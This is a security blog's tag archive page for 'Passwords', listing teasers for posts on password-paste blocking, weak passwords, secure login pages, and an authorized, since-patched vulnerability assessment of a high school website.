Browsed by
Tag: Passwords

Bank-grade Security or Why Blocking Password Pasting is not a Good Security Strategy

Bank-grade Security or Why Blocking Password Pasting is not a Good Security Strategy

Your friend creates a website. You are curious and you ask him: “is it secure?”, which, in your mind, probably means “did you secure your website to the best of your abilities?” and your friend replies: “Yes, it has bank-grade security”. Oh, “bank grade security”, damn! That means it’s very secure! Before you intervene, I am by no ways stating that banking websites are insecure – I am interested in how banks and other financial institutions deal with passwords though….

Read More Read More

Your passwords are terrible, and it’s time to do something about it

Your passwords are terrible, and it’s time to do something about it

You know what surprises me the most in regards to data breaches? It’s the fact that people still continue to use passwords like “password” or “123456” to protect their accounts. Think I’m kidding? I’m really not, take a look. Using passwords like these is a big issue because it leads to really, really bad things. Identity theft One day you log into your banking account to do some shopping and next thing you see is that you’ve got no money. You’ve…

Read More Read More

Creating a Secure Login Page

Creating a Secure Login Page

Login pages – they’re everywhere. Almost every website has a login page – from big companies to discussion forums. In this blog post I’ll try to explain how login pages work and also show how to create one, but instead of spoonfeeding information, I will only explain the core concept. I will also clarify how to mitigate two types of attacks that can occur if your website has a login functionality. Let’s begin, shall we? A login form – the basics…

Read More Read More

How I could have pwned my highschool (SQLi, CSRF, Hardcoded Passwords & XSS) – Part 1

How I could have pwned my highschool (SQLi, CSRF, Hardcoded Passwords & XSS) – Part 1

Introduction It happened. Someone told me a website was invulnerable. Coincidentally, since it also happened to belong to a highschool, I took it as a challenge, obtained permission to find flaws in it and have found some pretty serious ones later on. The flaws have since been patched. Blind, Boolean-Based SQL Injection SQL Injection (SQLi) is a vulnerability which allows an attacker to inject malicious code into SQL statements. When using such a vulnerability, an attacker may be able to…

Read More Read More